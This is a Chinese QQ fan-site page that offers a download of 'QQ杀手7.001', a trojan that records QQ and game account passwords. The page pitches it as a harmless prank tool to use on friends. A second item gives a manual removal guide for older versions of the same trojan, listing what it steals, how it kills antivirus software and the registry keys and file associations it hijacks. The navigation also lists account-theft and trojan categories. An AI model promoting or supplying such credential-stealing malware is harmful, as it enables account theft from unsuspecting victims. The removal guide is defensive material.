风网QQ站
风网QQ站首页
免费QQ秀
QQ聊天室
QQ表情
免费QQ
QQ游戏
QQ2003
QQ币
QQ表情下载
QQ秀商城
QQ校友录
QQ彩字
QQ杀毒
QQ头像
QQ字体
QQ病毒
QQ杀毒软件
最新QQ下载
QQ小游戏
QQ尾巴
QQ杀手
QQ皮肤
QQ贴图
QQ工具
腾讯QQ下载
QQ游戏下载
申请QQ号
qq2005
QQ家园
QQ外挂
腾讯QQ
QQ木马
QQ自定义表情
QQ软件下载
QQ木子版
YamQQ
QQ炸弹
QQ盗号
QQ文字
QQ商场
QQ2003木子版
QQ密码保护
QQ完美版
QQ显ip版
QQ密码
QQ软件
QQ聊天
QQ下载
       | 游戏点卡 | 风网小游戏 | 风网音乐 | 软件下载 | 常用网址 | 网上电台 | 游戏资讯 | 风网论坛 |
收藏本站 | 设为首页   

1.  QQ杀手7.001

软件语言: 简体中文
软件类别: 国产软件 / 特别栏目 / 腾讯QQ区
运行环境: WinXP, Win2000, NT, WinME, Win9X
授权方式: 免费软件
软件大小: 731 KB
软件等级:
整理时间: 2003-5-10 (admin)
开 发 商:
下载次数: 本日:190 本周:1094 本月:6528 总计:76067
软件简介: 一款供娱乐用的QQ密码安全工具,可以记录QQ,中游,边锋的密码,如果你想和你的朋友开开玩笑,实施恶作剧,本工具肯定能帮到你!

点这里下载

2.  QQ杀手6.75和6.80版的手动杀除方法

windowsQQ杀手
该木马的目标:
盗取服务器名、e-mail地址及口令、邮件标题、Password文件、SMTP ID及用户名(不像它的名字宣称的只是盗取QQ密码呀);自动检测并终止防病毒软件的进程(如:kav9x.exe、kavsvc9x.exe、kavsvcui.exe、ravmon.exe、smenu.exe以及watcher.exe等);

中毒时的症状:
当前进程中多出ESPLORER.EXE;
防病毒软件实时监控被莫名其妙地关闭并且无法重新打开;
各文件夹中出现随机文件名的*.exe文件,而且删除了还会再产生(文件大小一般在136k左右);

注册表中被新建的键值:
HKEY_CLASSES_ROOT win675 "youxiang_mima"
HKEY_LOCAL_MACHINE Software Microsoft CLASSESwin675 "fasong_youxiang"
HKEY_LOCAL_MACHINE Software Microsoft CLASSESwin675 "fasong_zhuti"
HKEY_LOCAL_MACHINE Software Microsoft CLASSESwin675 "fuwuqi"
HKEY_LOCAL_MACHINE Software Microsoft CLASSESwin675 "mima_wenjian"
HKEY_LOCAL_MACHINE Software Microsoft CLASSESwin675 "smtp_biaozhi"
HKEY_LOCAL_MACHINE Software Microsoft CLASSESwin675 "yonghu_ming"


注册表中被修改的键值:
HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion Run “Esplorer.exe”或随机文件名
HKEY_CLASSES_ROOT chm.file shell open command "(默认)" 随机文件名”" %1
HKEY_CLASSES_ROOT exefile shell open command "(默认)" 随机文件名”"%1" %*
HKEY_CLASSES_ROOT inifile shell open command "(默认)" 随机文件名” %1
HKEY_CLASSES_ROOT regfile shell open command "(默认)" “随机文件名” "%1"
HKEY_CLASSES_ROOT scrfile shell open command "(默认)" 随机文件名” %1" /S
HKEY_CLASSES_ROOT txtfile shell open command "(默认)" 随机文件名” %1
可见,所有*.chm,*.exe, *.ini, *.reg, *.scr, *.txt文件皆被关联。如果用户删除了那些随机文件名的病毒拷贝,则上述相映类型的文件将无法正常打开!

手动删除的方法:

终止ESPOLRER.EXE进程;

将regedit.exe复制或改名为regedit.com,并运行regedit.com(因为*.exe文件已经被关联了,直接运行regedit.exe会使病毒重新加载。)

删除注册表中的下列项:
HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion Run ESPLORER 或随机文件名
HKEY_CLASSES_ROOT win675主键
HKEY_LOCAL_MACHINE Software Microsoft CLASSES win675主键

修改下列键值如下:
HKEY_CLASSES_ROOT chm.file shell open command "(默认)" "%windir%hh.exe" %1
HKEY_CLASSES_ROOT exefile shell open command "(默认)" "%1" %*
HKEY_CLASSES_ROOT inifile shell open command "(默认)" %windir%NOTEPAD.EXE %1
HKEY_CLASSES_ROOT regfile shell open command "(默认)" regedit.exe "%1"
HKEY_CLASSES_ROOT scrfile shell open command "(默认)" "%1" /S
HKEY_CLASSES_ROOT txtfile shell open command "(默认)" %windir%NOTEPAD.EXE %1

重新启动,然后删除(建议先在软盘上备份,以免误删除)各文件夹内修改时间在2003-01-01至2003-12-31间的所有大小为136k左右带有随机文件名的.exe文件。


   

关于我们 网站地图 联系方式 友情链接 广告服务 风网数字卡 网上开店 墨香轩轩

©2005-2008 QQ